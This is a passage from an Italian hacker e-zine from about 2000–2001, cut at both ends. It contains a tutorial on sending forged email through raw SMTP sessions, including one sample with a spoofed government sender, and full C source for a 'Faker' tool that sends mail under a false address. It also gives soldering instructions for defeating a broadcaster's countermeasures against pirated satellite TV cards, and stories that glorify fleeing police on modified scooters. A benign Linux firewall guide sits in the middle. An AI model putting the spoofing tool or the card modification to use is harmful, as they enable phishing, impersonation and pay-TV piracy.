del server, naturalmente tramite /bin/telnet. darkstar:/# telnet alvo 25 Trying XXX.XXX.XXX.X... Connected to X. Escape character is '^]'. 220 XXX ESMTP Sendmail 8.9.3/8.9.3; Sun, 31 Dec 2000 22:26:22 -0300 helo localhost.localhost 250 XXX Hello localhost [127.0.0.1], pleased to meet you mail from: fhc@senato.gov.br 250 fhc@senado.gov.br... Sender ok rcpt to: root@localhost 250 root@localhost... Recipient ok data 354 Enter mail, end with "." on a line by itself testo della fakemail . 250 WAA00163 Message accepted for delivery quit 221 darkstar closing connection Connection closed by foreign host. Adesso vi riporto molto semplicemente i comandi che abbiamo dettato, questi sono i semplici passi: 1 - HELO diamo una sorta di benvenuto al servizio 2 - MAIL FROM: 3 - RCPT TO: 4 - DATA scrivete qui il testo del messaggio 5 - E . lasciate una riga e scrivete un punto Ed ecco il programma che ho trovato e modificato grazie all'aiuto di un mio amichetto sconociuto...: ------------------------------------------------------------------------- /* PROGRAMMA PER L'INVIO DI E-MAILS * CON INDIRIZZO DI ORIGINE ERRATA. * syn@hackersat.com * http://www.hackersat.com/ */ #include #include #include #include #include #include #include #define ERROR -1 #define PORT 25 int Mensagem(int Socket); int main(int argc, char *argv[]){ char Recv[1024], Send[1024]; int Socket, R; struct hostent *host; struct sockaddr_in alvo; if(argc < 4){ printf("Faker - Envia Mails Forjados!\n\n"); printf("Uso: %s [host_alvo] [usuario_alvo] [rementente_forjado]\n\n",argv[0]); printf("H@ - http://www.hackersat.com/\n"); exit(ERROR); } host = gethostbyname(argv[1]); if(host == NULL){ fprintf(stderr,"Host Desconhecido!\n"); exit(ERROR); } alvo.sin_family = host->h_addrtype; alvo.sin_port = htons(PORT); alvo.sin_addr = *((struct in_addr *)host->h_addr); bzero(&(alvo.sin_zero), 8); Socket = socket(AF_INET, SOCK_STREAM,0); if(Socket < 0){ perror("Socket"); exit(ERROR); } if(connect(Socket,(struct sockaddr * )&alvo, sizeof(alvo)) < 0){ fprintf(stderr,"Erro em connect()!!\n"); close(Socket); exit(ERROR); } bzero(Send, sizeof(Send)); bzero(Recv, sizeof(Recv)); snprintf(Send,1023,"HELO localhost.%s\n",argv[1]); write(Socket,Send,strlen(Send)); if ((R = read(Socket, Recv, sizeof(Recv))) < 0){ fprintf(stderr,"Risposta!"); close(Socket); exit(ERROR); } if(!strstr(Recv,"ok")){ printf("1o. Helo risposto OK!:)\n"); } else{ fprintf(stderr,"Problema con HELO!\n"); close(Socket); exit(ERROR); } bzero(Send, sizeof(Send)); bzero(Recv, sizeof(Recv)); snprintf(Send,1023,"MAIL FROM: %s\n",argv[3]); write(Socket,Send,strlen(Send)); if ((R = read(Socket, Recv, sizeof(Recv))) < 0){ fprintf(stderr,"Risposta per MAIL FROM!\n"); close(Socket); exit(ERROR); } if(!strstr(Recv,"ok")){ printf("2o. Mail From risposto OK!:)\n"); } else{ fprintf(stderr,"Problema con Mail From!\n"); close(Socket); exit(ERROR); } bzero(Send, sizeof(Send)); bzero(Recv, sizeof(Recv)); snprintf(Send,1023,"rcpt to: %s\n",argv[2]); write(Socket,Send,strlen(Send)); if ((R = read(Socket, Recv, sizeof(Recv))) < 0){ fprintf(stderr,"Risposta per Rcpt to!\n"); close(Socket); exit(ERROR); } if(!strstr(Recv,"Recipient ok")){ printf("3o. Rcpt To risposto OK!:)\n"); } else { fprintf(stderr,"Problema con RCPT TO!\n"); close(Socket); exit(ERROR); } bzero(Send, sizeof(Send)); bzero(Recv, sizeof(Recv)); Mensagem(Socket); return 0; } #define max(x,y) ((x)>(y)?(x):(y)) int Mensagem(int Socket){ char envia[4056], recebe[1024], buffer[4056]; fd_set rset; int R, maxfd; sleep(1); bzero(envia, sizeof(envia)); bzero(recebe, sizeof(recebe)); printf("Digite sua Mensagem\n"); strcpy(envia,"DATA\n"); write(Socket, envia, strlen(envia)); if ((R = read(Socket, recebe, sizeof(recebe))) < 0){ fprintf(stderr,"Problema con DATA!\n"); close(Socket); exit(ERROR); } if(!strstr(recebe,"Enter mail")){ bzero(envia, sizeof(envia)); bzero(recebe, sizeof(recebe)); for (;;){ FD_SET(fileno(stdin), &rset); FD_SET(Socket, &rset); maxfd = max(fileno(stdin), Socket) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(envia, sizeof(envia)); while(!strstr(envia,"FIM")){ fgets(buffer, sizeof(envia) - 2, stdin); strcat(envia,buffer);} strcat(envia,"\n.\n"); write(Socket, envia, strlen(envia)); } if (FD_ISSET(Socket, &rset)) { bzero(recebe, sizeof(recebe)); if ((R = read(Socket, recebe, sizeof(recebe))) == 0){ printf("ok!\n"); } } else { return (ERROR); } } } bzero(envia, sizeof(envia)); bzero(recebe, sizeof(recebe)); strcpy(envia,"QUIT"); write(Socket, envia, strlen(envia)); if ((R = read(Socket, recebe, sizeof(recebe))) < 0){ fprintf(stderr,"Ctrl + C!\n"); close(Socket); exit(ERROR); } printf("Fakemail inviata con successo!!\n"); return 0; } ------------------------------------------------------------------------ Adesso vi mostro un piccolo mio "vecchio" esempio di fakemail con un'analisi + accurata. Sicuramente la maggiorparte di voi ha incontrato o configurato un programma in internet per l'invio di posta ...da questo deduciamo che è essenziale conoscere il nome di un certo SMTP server ovvero il server dedicato alle outgoing mail oltre ad alcune informazioni sull'utente. Siccome tuttavia a noi utenti di Linux piace molto lavorare il piú possibile senza programmi che facciano da tramite tra noi e l'azione che vogliamo eseguire, vediamo in dettaglio cosa accade quando ci mettiamo in contatto con questo server. SMTP SERVER: Quando deve spedire un messaggio di posta elettronica il nostro programmino si collega alla porta 25 dell'SMTP SERVER e fornisce alcuni comandi che ora vedremo nel dettaglio. Proviamo dunque a collegarci alla porta 25 di un qualsiasi server SMTP, per esempio sibervision.com. Riporto di seguito una sessione qualsiasi telnet sibervision.com 25 Connected to sibervision.com. Escape character is '^]'. 220 ESMTP www15.clever.net Sendmail 8.8.5/8.6.9 ready at Wed, 19 Mar 1997 19:54:47 -0500 (EST) HELO default 250 www15.clever.net Hello swrm250-126.iol.it [194.21.250.126], pleased to meet you MAIL FROM: pd.gabanaz@iol.it 250 pd.gabanaz@iol.it... Sender ok RCPT TO: pd.gabanaz@iol.it 250 pd.gabanaz@iol.it... Recipient ok DATA 354 Enter mail, end with "." on a line by itself subject: Ma sei scemo che ti mandi i messaggi da solo?? in effetti mi sento molto solo :-) . 250 TAA18303 Message accepted for delivery QUIT Vediamo un po in dettaglio cosa è successo...ovviamente le linee precedute da numeri sono le risposte dell'host a cui mi sono collegato. Non appena entriamo nella porta 25 ci viene comunicato che in quella porta è funzione una versione di Sendmail, proprio il programma dedicato alla consegna di messaggi di posta elettronica. Come sapete, questo fatto della versione di sendmail ci è molto utile sopratutto se vogliamo bucare il server! Con il comando HELO ci presentiamo al server, infatti serve solo a comunicare al server che siamo pronti. A questo punto diciamo tramite il comando MAIL FROM: quale indirizzo va inserito nel campo From:, quello al quale poi verranno inviate eventuali repliche, dopodiche' con RCPT TO: diciamo a sendmail a chi deve recapitare questa mail e tramite il comando DATA inseriamo rispettivamente il subject del messaggio, il testo vero e proprio ed un punto da solo su una linea per comunicare la fine del messaggio. A questo punto la linea 250 TAAA18303 Message... ci dice che il messaggio con TUTTI i dati di chi lo spedisce è stato memorizzato e verrá recapitato al piú presto . Bene, spedito il messaggio andiamo a controllare con Pine (programma che spedisce messaggi tramite SMTP) che cosa è successo: Se ritiriamo la posta e diciamo a Pine di visualizzare tutti i campi vediamo quanto segue: X-POP3-Rcpt: pd.gabanaz@iol-mail.iol.it Return-Path: pd.gabanaz@iol.it Received: from www15.clever.net (root@[208.5.1.1]) by iol-mail.iol.it (8.8.3/8.6.12) with ESMTP id BAA02914 for ; Thu, 20 Mar 1997 01:56:31 +0100 From: pd.gabanaz@iol.it Received: from swrm250-126.iol.it [194.21.250.126] by www15.clever.net (8.8.5/8.6.9) with SMTP id TAA18303 for pd.gabanaz@iol.it; Wed, 19 Mar 1997 19:55:40 -0500 (EST) Date: Wed, 19 Mar 1997 19:55:40 -0500 (EST) Message-Id: <199703200055.taa18303@www15.clever.net> subject: Ma sei scemo che ti mandi i messaggi da solo?? in effetti mi sento molto solo :-) ebbene abbiamo spedito una e-mail direttamente dalla porta 25 del nostro SMTP host! È facile verificare che semplicemente cambiando alcuni dati in fase di impostazione possiamo spedire quella che viene comunemente denominata fake mail, ovvero messaggi "truccati di posta elettronica"...anziché ripetere il processo vi faccio vedere semplicemente il log di una sessione in cui ho spedito, sempre a me stesso, una fake-mail: telnet sibervision.com 25 Connected to sibervision.com. Escape character is '^]'. 220 ESMTP www15.clever.net Sendmail 8.8.5/8.6.9 ready at Wed, 19 Mar 1997 19:54:47 -0500 (EST) HELO vediamo.che.succede.com 250 www15.clever.net Hello swrm250-126.iol.it [194.21.250.126], pleased to meet you MAIL FROM: hey@funziona 250 hey@funziona... Sender ok RCPT TO: pd.gabanaz@iol.it 250 pd.gabanaz@iol.it... Recipient ok DATA 354 Enter mail, end with "." on a line by itself subject: sembra carino, no? ciao ciao . 250 TAA18303 Message accepted for delivery QUIT 221 www15.clever.net closing connection E questo è al solito il risultato: X-POP3-Rcpt: pd.gabanaz@iol-mail.iol.it Return-Path: hey@funziona Received: from www15.clever.net (root@[208.5.1.1]) by iol-mail.iol.it (8.8.3/8.6.12) with ESMTP id BAA02914 for ; Thu, 20 Mar 1997 01:56:31 +0100 From: hey@funziona Received: from vediamo.che.succede.com (swrm250-126.iol.it [194.21.250.126]) by www15.clever.net (8.8.5/8.6.9) with SMTP id TAA18303 for pd.gabanaz@iol.it; Wed, 19 Mar 1997 19:55:40 -0500 (EST) Date: Wed, 19 Mar 1997 19:55:40 -0500 (EST) Message-Id: <199703200055.taa18303@www15.clever.net> subject: sembra carino, no? ciao ciao Come vedete questa volta "sembra" che la lettera sia stata spedita dall'host: vediamo.che.succede.com e che il mittente sia un certo: hey@funziona Ovviamente all'utente piú esperto non sfuggirá il fatto che in realtá accanto a: vediamo.che.succede.com si trova esplicitamente il nome di un provider che non coincide proprio con quel che vorremmo sembrasse, peró tenete presente che quasi mai si guardano tutti i campi di una mail, quindi per fare qualche scherzetto innocente andrá piú che bene ! Una ultima nota: in tutti i messaggi compare un identificatore di messaggio, ebbene tramite quello, facendone eventualmente richiesta al sysop, chiunque abbia spedito fakemail è rintracciabile, poiché in esso sono racchiusi data, ora e IP di chi si collega, ovvero tutti i dati necessari per decodificare la provenienza del messaggio. Inoltre a seconda delle versioni di Sendmail che compaiono possono esservi alcune modificazioni; potrebbero per esempio comparire al posto del campo From un Apparently from o anche un Apparently to, tuttavia vale quanto sopra, cioé difficilmente si guarda a questi campi; in alcune implementazioni di Sendmail sono presenti anche i comandi di help, quindi una volta entrati alla porta 25 provate il comando HELP per vedere se è disponibile, ed eventualmente date un'occhiata alle possibilitá che avete. è tutto Parti di questo testo mi sono state inviate. Prima rielaborate. sYn syn@hackersat.com www.hackersat.com /===========================::=============================::=================/ / /Costruire un bunker linux: Firewalling di base / kEwL / /===========================::=============================::=================/ Costruire un Bunker Linux: Firewalling di Base di Rafael Coninck Teigao tradotto da kEwL` ultimo aggiornamento Lunedì, 8 Maggio 2000 -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Questo articoo presenta un modo di convertire ogni separata macchina che hai in una rete dietro un gateway, utilizzando il Network Address Translation (NAT), e le funzioni di firewalling presenti in Linux. Alcune nozioni di base per essere indirizzato. Questo non è un host ordinario, e non dovrebbe essere visto. Questo host sarà usato solo per il firewalling e NAT, e nient'altro. Questo significa che non dovrai eseguire altri servizi. Inoltre, se stai per reindirizzare dei servizi in una macchina all'interno, assicurati che il servizio non abbia molte vulnerabilità, e che sia aggiornato. Se non tieni conto di queste cose, il tuo firewall potrebbe diventare inutile. Le ultime versioni del kernel di Linux non sono sicuramente le versioni più staili e affidabili. Se la tua macchina non necessita gli ultimi drivers, scarica e installa un kernel stabile, sicuro e ben testato; il kernel 2.0.38 è il migliore. Devi abilitare l'IP Forwarding, l'IP Masquerading, l'IP Firewalling, l'IP Transparent Proxying e l'IP Routing. Se stai avendo dei dubbi a compilare questo kernel, dai uno sguardo a http://www.suse.de/~florian/kernel+egcs.html. Questo sito ha una patch per compialre questo kernel con egcs. Ora che hai installato e compilato un kernel stabile, e letto e messi in pratica gli articoli nominati precedentemente, andiamo a configurare il firewall. Ho creato una serie di shell scripts che ti aiuteranno nella configurazione di base. Come li presento, spiegherò cosa fanno, come usarli e dove metterli. Per piacere, ricordati che penso tu stia usando RedHat e che le directory potrebbero essere diverse in altre distribuzioni. Inoltre, dovresti cambiare il blocco di indirizzi interni (ho usato 10.x.x.x) in quello che vuoi. Usare indirizzi IP non utilizzati nella rete interna è una buona idea per un certo numero di ragioni, l'ultima delle quali che non avrai nessun problema di collisione fra IP interni ed esterni. File: firewall Path: /etc/rc.d/init.d/ # Svuota il firewall ipfwadm -F -f ipfwadm -I -f ipfwadm -O -f # # setta IP packet Accounting e Forwarding # # Forwarding # # DENY tutti i servizi ipfwadm -F -p deny # E ACCEPT tutte le connessioni dell'interfaccia interna ipfwadm -F -a accept -m -P all -S 10.0.0.0/8 # # setta IP pachet per Transparent Proxying # usa questo SOLO se hai SQUID sulla macchina # # Entrata # # ACCEPT tutti i servizi ipfwadm -I -p accept # Questo reindirizzerà tutte le connessioni verso l'interno al tuo proxy ipfwadm -I -a accept -P tcp -S 10.0.0.0/8 -D 0.0.0.0/0 80 -r 3128 # # Setta a DENY tutte le connessioni da un IP # # Entrata # # ipfwadm -I -a deny -P all -S IPnumber Eseguilo all'avvio. Editare /etc/hosts.allow e /etc/hosts.deny è una buona idea. Dovrebbero essere simili a questi: File: hosts.allow Path: /etc/ ALL: 10. 22: ALL 80: ALL File: hosts.deny Path: /etc/ ALL: ALL In questo modo stai accettando ogni connessione in entrata alla porta SSH e HTTP, connessioni da 10.x.x.x per lavorare con ogni demone installato sul firewall, e rifiutando tutte le altre connessioni. I prossimi script sono usati per controllare se tutto è in esecuzione, e cercando di risolvere semplici problemi come se per esempio cade un'interfaccia o il masquerade proxy smette di lavorare. File: crontab --> modificalo per aggiungere queste linee (crontab -e) Path: /etc/ 0-59 * * * * root /usr/local/gateway/bin/check-ALL-masq 0-59 * * * * root /usr/local/gateway/bin/check-ALL-eth File: check-ALL-masq Path: /usr/local/gateway/bin/ #!/bin/sh /usr/local/gateway/bin/check-CU_Seeme `lsmod | awk '{print $1}' | grep ip_masq_cuseeme` /usr/local/gateway/bin/check-FTP `lsmod | awk '{print $1}' | grep ip_masq_ftp` /usr/local/gateway/bin/check-IRC `lsmod | awk '{print $1}' | grep ip_masq_irc` /usr/local/gateway/bin/check-Quake `lsmod | awk '{print $1}' | grep ip_masq_quake` /usr/local/gateway/bin/check-RealPlayer `lsmod | awk '{print $1}' | grep ip_masq_raudio` /usr/local/gateway/bin/check-VDOLive `lsmod | awk '{print $1}' | grep ip_masq_vdolive` File: check-CU_Seeme; check-FTP; check-IRC; check-Quake; check-RealPlayer; check-VDOLive Path: /usr/local/gateway/bin/ #!/bin/sh case "$1" in OPTION_1) exit 0 esac /usr/local/gateway/bin/solve-ALL-masq OPTION_2 Dove OPTION_1 e OPTION_2 dovrebbero essere prese dlla tabella sottostante. Ricorda che devi creare 6 files differenti. File OPTION_1 OPTION_2 check-CU_Seeme ip_masq_cuseeme cuseeme check-FTP ip_masq_ftp ftp check-IRC ip_masq_irc irc check-Quake ip_masq_quake quake check-RealPlayer ip_masq_raudio raudio check-VDOLive ip_masq_vdolive vdolive File: solve-ALL-masq Path: /usr/local/gateway/bin/ #!/bin/sh case "$1" in all) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_cuseeme.o modprobe -s ip_masq_ftp.o modprobe -s ip_masq_irc.o modprobe -s ip_masq_quake.o modprobe -s ip_masq_raudio.o modprobe -s ip_masq_vdolive.o ;; cuseeme) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_cuseeme.o ;; ftp) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_ftp.o ;; irc) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_irc.o ;; quake) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_quake.o ;; raudio) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_raudio.o ;; vdolive) cd /lib/modules/2.0.38/ipv4 modprobe -s ip_masq_vdolive.o ;; *) echo "" echo "Usage: solve-ALL-masq {all|cuseeme|ftp|irc|quake|raudio|vdolive}" echo "" exit 1 esac File: check-ALL-eth Path: /usr/local/gateway/bin/ #!/bin/sh /usr/local/gateway/bin/check-ETH0 `ifconfig | awk '{print $1}' | grep eth0` /usr/local/gateway/bin/check-ETH1 `ifconfig | awk '{print $1}' | grep eth1` File: check-ETH0; check-ETH1 Path: /usr/local/gateway/bin/ #!/bin/sh case "$1" in eth0) exit 0 esac /usr/local/gateway/bin/solve-ALL-eth eth0 Cambia eth0 in eth1 per creare entrambi i files. File: solve-ALL-eth Path: /usr/local/gateway/bin/ #!/bin/sh case "$1" in all) /etc/rc.d/init.d/network restart ;; eth0) echo "" echo "Reinitializing eth0" echo "" /sbin/ifup eth0 ;; eth1) echo "" echo "Reinitializing eth1" echo "" /sbin/ifup eth1 ;; *) echo "" echo "Usage: solve-ALL-masq {all|eth0|eth1}" echo "" exit 1 esac Dopo di ciò, hai una firewall con il masquerading. Passi finali: scarica, installa e impara ad usare dei tools che ti aiuteranno a gestire e risolvere problemi futuri con il tuo firewall. Sniffer: il miglior modo di risolvere i problemi di rete. Gli sniffers di pacchetti ti mostrano il traffico sulla tua rete. Il miglior sniffer è Sniffit, disponibile con la documentazione a: http://reptile.rug.ac.be/~coder/sniffit/sniffit.html Redirect: questo tool è usato per reindirizzare le connessioni che vengono da un IP e un porta verso un altro IP e un'altra porta. Poi usare questo sul firewall per reindirizzare le connessioni su una macchina interna, o idealmente, su una macchina che non sta dietro al firewall. Questo ti permetterà di avere i servizi accessibili all'esterno, senza aver bisogno di farli passare attraverso un firewall. Il tool che uso è chiamato rinet e può essere trovato, insieme alla documentazione, a: http://www.boutell.com/rinetd/. Monitoraggio dell'Utilizzo di Rete: E' molto importante sapere quanto e come è utilizzta la tua rete, così puoi fare dei piani sull'upgrading, capire i bisogni dei tuoi clients e analizzare il traffico di rete. Un tool che è tra i più diffusi è chiamato NTop. E' simile al comando Unix top e ha interfaccia testuale e web based. Puoi trovarlo a: http://www.ntop.org/. Proxy: la maggior parte degli amministratori vogliono installare un server proxy, per ridurre il lavoro di banda che si ha quando le persone accedono a una pagina web. Il modo più facile di fare ciò è settare un Transparent Proxy sulla macchina Firewall/NAT. Nella configurazione del firewall c'è una regola sul Transparent Proxying. Se lo setti, dai uno sguardo a Squid, il proxy server più diffuso: http://www.squid-cache.org/. Altre risorse NAT: ci sono molte pagine web su NAT, e queste possono aiutarti se ci sono problemi descritti in questo documento, o se semplicemente vuoi maggiori informazioni: Linux IP Masquerade HOWTO : http://www.linuxdoc.org/HOWTO/IP-Masquerade-HOWTO.html. IP Masq ICQ : http://members.tripod.com/~djsf/masq-icq/. IP Masquerade Application Collection : http://members.home.net/ipmasq/. TkMasqdialer : Controlla le connessioin PPP su un server Masq: http://www.midcoast.com.au/~mvoase/tkmasq.html. Server HTTP: il server Apache ha opzioni per settare virtual hosts e anche per reindirizzare connessioni HTTP in entrata. Il miglior modo di usare un host interno come HTTP server per il mondo è usare Apache con il reindirizzamento all'host interno: http://www.apache.org/. Questo è probabilmente tutto quello che dovresti sapere sui server Firewall/NAT se non vuoi complicarti la vita nella tua configurazione. Spero che farai buon uso di questi scripts che ho presentato, e che li trovi facili da modificare per adattarli alla tua rete. Ho usato questa configurazione per 2 anni su molte macchine e nessuna ha mai subito un'intrusione - e i miei logs dicono che la gente ci ha provato. Questo non significa che è impossibile entrarvi, poichè qualcuno potrebbe trovare un errore e sfruttarlo. Quindi dovresti tenere sempre un occhi aperto e leggere i documenti di sicurezza sul tuo sistema operativo e sulle applicazioni che usi, e aggiornare sempre tutto. /===========================::=============================::=================/ / /Inserimento Zener / sYn / /===========================::=============================::=================/ Lo abbimo testato io è un mio amico, abbiamo fino ad ora riscontrato buoni risultati. Bene cosa è lo zener ? Lo zener non è altro che un semplice diodo. Che messo tra alcuni determinati piedini dell'eeprom e chip riescono a filtrare i dati maliziosi che vengono inviati dai dirigenti per chi usa le tanto conosciute wafercard piratate. Gli effetti dell'invio di questi dati, + conosciuto come la "bomba", sono quello dell'alterazione dei codici, così da non poter far vedere nulla! E per noi questo è molto molto fastidioso.... Quindi passiamo subito a quello che dovete fare. In un comune negozio di elettronica dovreste acquistare un diodo mezzo W/12 V (mezzo watt /12 volt), con questo tipo di diodo abbiamo sperimentato noi. Adesso con un normale saldatore dobbiamo saldare sui piedini 4 - 4 di chip ed eeprom (rispettivamente). Senza troppe parole vi ho reso facile il compito con un piccolo disegnino ! \--------------\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \||||||||| ||||\ \||||||||| ||||\ \ | | \ \ |_==_| \ \ zener \ (osservate bene i piedini) \--------------\ Penso di essere stato + chiaro possibile. Scusatemi se ho sbagliato qualcosa nella spiegazione e vi invito a scrivermi per qualsiasi incomprensione. sYn syn@hackersat.com www.hackersat.com /===========================::=============================::=================/ / /Modifica alla Scarabeo (Aprilia) / Jrash / /===========================::=============================::=================/ Ciao ragazzi sono sempre io, Jrash, in questo articoletto vorrei parlarvi di una cosetta molto sfiziosa che abbiamo fatto io e il mio amico Emilio durante quest'estate... credo che tutto cio che abbiamo fatto non l abbia fatto mai nessuno..... Percio vi invito a leggere tutto e poi alla fine, se ne avete le capacita di provare anche voi a farlo... Mamma mia, solo al pensiero mi viene la voglia di rifarlo.... che bella sensazione, una cosa davvero stupenda........ Era il diciotto luglio dell estate 2000/2001, una giornata non molto bella poiche c era un po' di vento ed allora io e il mio amico Emilio decidemmo di non andare al mare e di andare nel suo garage a fare qualche esperimento sui nostri motorini.... Gia da come spero avete capito il mio motorino è un SR preparato, cioè da competizione che sulle strade della citta' è davvero un bolide... Allora mentre andavamo nel garage di Emilio io mi divertivo a impennare su una sola ruota e ha fare il "pazzo" nel traffico, emilio faceva lo stesso con il suo direi "grande" scarabeo dell aprilia, sempre da competizione, con una ripresa pari a quella di uno dei migliori 125, uno scooter veramente fantastico che solo pazzi come noi hanno il coraggio di guidare... Arrivati una volta nel garage poggiamo gli scooter sul pavimento e muniti di chiavi iniziammo a smontare marmitta, ruote , sospensioni e carrozzeria. Una volta fatto cio' non sapevamo cosa fare e cosi andammo a comprarci un gelato; per la strada vedemmo uno scooter un motorino direi un po' strano che non avevo mai visto prima d ora, se non mi sbaglio era della YAMAHA....boh non mi ricordo.. Comunque questo motorino ci aveva colpito molto e cosi andammo di corsa al garage di Emilio, e decidemmo di mettere le route dell sr allo scarabeo, e quelle dello scarbeo all'sr... Cosi ci mettemmo al lavoro, un duro lavoro direi, non tanto per lo scarabeo ma per l sr perche per metterci la ruota dello scarabeo dovevamo smontare anche parafango e tutto il carter oil, una vera seccatura , ma ne valeva la pena. Montate le ruote ci accingemmo a fare lo stesso con le sospensioni: qui la cosa si complica ancora di piu', infatti dovevamo smontare tutta la carrozzeria sospensioni, di nuovo la ruota davanti i freni e tutto il resto. Dopo tre ore di duro lavoro anche l operazione sospensioni era completata. I I motorini dopo questa modifica erano davvero dei mostri, erano conciati in tal modo che se ci prendeva la polizia ci arrestavano. Durante quei momenti ero molto felice ed emozionato, subito io e il mio amico andammo nella costiera amalfitana, essendo di salerno, per provare i nostri motorini. I motorini avevano caratteristiche spaventose, ma anche molti difetti lo scarabeo era fenomenale, poiche pur avendo un assetto bassissimo nelle curve aveva una resa stupenda, per non parlare poi delle altre prestazioni; il mio scooter non era molto stabile nelle curve , ma nel traffico assumeva una manovrabilita' eccezionale soprattutto nel cosidetto Zig-zag.....come mi piacerebbe rifarlo....a cosa darei.....lol Credo che voi pensiate che io sia un pazzo, si questo pure è vero, ma non bisogna escludere che io ed Emilio siamo dei grandi.......sfido chiunque a fare quello che ho fatto io. Beh...ora vi saluto perche non so cosa dirvi piu..... Se volete scrivermi la mia E-mail gia la conoscete.... Okk vi saluto alla prossima.......ByEzZ..... Ringrazio gli amici di IRC e non.... Giadina ti amo:)) w w w . h a c k e r s a t . c o m [Jrash]° /===========================::=============================::=================/ / /L'inseguimento / Jrash / /===========================::=============================::=================/ Ciao gentaglia, sono Jrash il matto; in questo articolo che giudico molto sfizioso vi parlero' di una cosa accaduta a mio fratello maggiore un paio di anni fa'. Mio fratello si chiama genny, ha 9 anni piu di me e fino a poco fa' possedeva una vespa 50. All eta' di 16 anni, cioè ben 10 anni fa'girava con la sua vespa per le strade della mia citta', Salerno, senza casco(il casco allora non andava di moda). Quando giro a un' angolo della strada , guarda un po' la sfiga incontro'due chips (poliziotti sulle moto) davanti a un bar. Questi appena videro mio fratello senza casco mostrarono la paletta per fallo accostare per poi sequestrargli la vespa. Mio fatello che non è un fesso fece finta di accostare per poi partire alla massima velocita'. Qui viene il bello...seguitemi che inizia l inseguimento.I poliziotti non stando al fatto accesero la sirena e iniziarono a seguirlo. L'inseguimento duro per ben 40 minuti di puro fuoco . Mio fratello per prima cosa si fece un tratto di strada sul marciapiede e poi scese un paio di gradini con la sua vespa; dopo essersi fermato per vedere dove erano andati a finire i chips, continuo nella sua fuga. In quel giorno la sfiga lo perseguitava : per il cammino incontro un'altra coppia di poliziotti che stavano facendo il posto di blocco....Mio fratello non si fermo ed anche questi si unirono ai colleghi. Vedendo che la situazione stava mettendosi male decise di nascondersi in un portone di un palazzo, e cosi' riusci a svignarsela. Incosciente che i poliziotti stavano ancora in agguato dopo solo dieci minuti usci dal suo nascondiglio . Subito dopo essere uscito dal portone ecco che si ritrova di nuovo i chips alle calcagne, mentre l altra coppia di sbirri gia aveva rinunciato.. Continuo' nella sua fuga: per prima cosa ando in una strada zeppa di auto, un vero e proprio caos e li' riusci' a distaccarsi un po' dalla police perche' lui con la sua vespa era molto piu' agile nel traffico; poi ando' verso la periferia e se ne scappo in una stradina di campagna semi distrutta... Ora per i poliziotti era davvero un bel problema perche' le loro moto non erano adattte per questo tipo di strada. Dopo dieci minuti, mio fratello ritorno sulla strada normale, e senza fare il buffone si fece piu' di un kilometro in controsenso rischiando la morte... i poliziotti continuavano a seguirlo , fino a quando due pullman nel tentativo di sorpassarsi l'uno contro l'altro chiusero la strada a mio fratello che per evitare l impatto con l automezzo dovette frenare bruscamente, e il poliziotto a sua volta freno' anch'egli, pero' purtroppo la sua moto non resse la frenata e quindi scivolo' provocando una brutta caduta ai danni del poiziotto che per fortuna non si fece nulla di grave. Alla fine pero' mio fratello cosciente di quello che aveva provocato accosto per soccorrere il poliziotto che quando si alzo da terra , prima lo prese a schiaffi e poi chiamo 'il carrattrezzi per sequestrare la vespa, inoltre gli fece una multa di 500.000 lire per guida pericolosa ed altro... Eccomi qui anche questo racconto è teminato, se avete voglia di parlarmi su tutto quello che riguarda mezzing non esitate a chiamarmi, la mia E-mail la conoscete ma per quelli che non ka conoscono ve la ripeto volentieri: jrash@hackersat.com Vorrei salutare gli amici di #buonavolonta, e in particolare Maryee e alterego^.. Un bacio alla mia giada....A[v]a[t]A[r] il castoro........ /===========================::=============================::=================/ / /Italian freching / A[v]a[t]A[r / /===========================::=============================::=================/ ItAliaN FreChINg Mi raccomando date un sguardo al disclaimer lo so che è palloso ma è pur sempre obbligatorio. DisclaiMer: Questo testo è stato scritto a solo scopo informativo, i personaggi e i contenuti presenti in questa narrazione sono da ritenersi frutto della mente malata dell'autore che non si assume nessuna responsabilità per gli atti dai voi commessi.Prima di fare qualche cazzata rifletteteci su e se proprio volete farla prendetevi tutte le vostre responsabilità. EnD Of disclaimer Eccoci di nuovo a scrivere per dn che cresce sempre di piu sia in qualita che in quantità. Io cerco di essere sempre utile con i miei testi e credo che questa crescita sia dovuta anche al mio contributo. Eppure stavo rischiando di non scrivere neanche un articolo per questa edizione (forse vi avrebbe fatto piacere) visto che la scheda madre del mio adorato pc se ne andata per sempre.In questo momento il mio computer starà per essere riparato e quindi presto tornera ad essere utilizzato al meglio.Sicuramente a tutti i lettori sara sorta un domanda che ritengo scontata: MA ALLORA COME CAZZO STAI SCRIVENDO QUESTO ARTICOLO. Ed io tanto semplicemente vi rispondo: STO SCRIVENDO QUESTO ARTICOLO DAL PC DI SYN. aPPROPOSITO DI SYN (cazzo avevo dimenticato le maiuscole) lo sapevate che sta imparando a suonare la chitarra.Vabbe penso che non ve ne freghi piu di tanto. Cmq iniziamo con la narrazione che si appresta ad essere uno dei migliori articoli della storia del phreaking. Start of Narration Era un sabato sera come tanti anzi no era peggiore infatti pioveva e io,syn,Jrash minm e Zi_pePp fummo costretti ad uscire a piedi in cerca di un po di divertimento.Dopo esserci messi d'accordo sulla destinazione ci incamminammo verso il Mc_donald della mia città, per la strada parlavamo tranquilli dei soliti problemi ignari di quello che ci aspettava qualche ora dopo.Arrivammo al mC-capocchia e dopo aver mangiato qualcosa e aver tentato qualche impresa di tacchinaggio ci avviamo sconsolati per le vie della città. Quella sera camminammo non so per quanti chilometri forse 20 e alla fine eravamo esausti; scausalmente ci fermammo a riposare su una sbarra , avete presente quelle dei parcheggi o dei passaggi a livello,bene, e neanche a farlo apposta indovinate cosa c'era a soli due metri di distanza,le nuovissime cabine della Telekoz.Anche se non avevamo bevuto ne fatto uso di sostanze stupefacenti eravamo fuori di brutto (il primo era il sottoscritto) mi diressi verso la cabina rassicurato dalla calma della notte e la solitudine del posto.Arrivato vicino alla cabina inizia a smanettare un po con la tastiera e credetemi senza nenche fare un graffio alla cabina ne dando qualche colpo improvvisamente il display si illumino e usci scritto: MENU DI 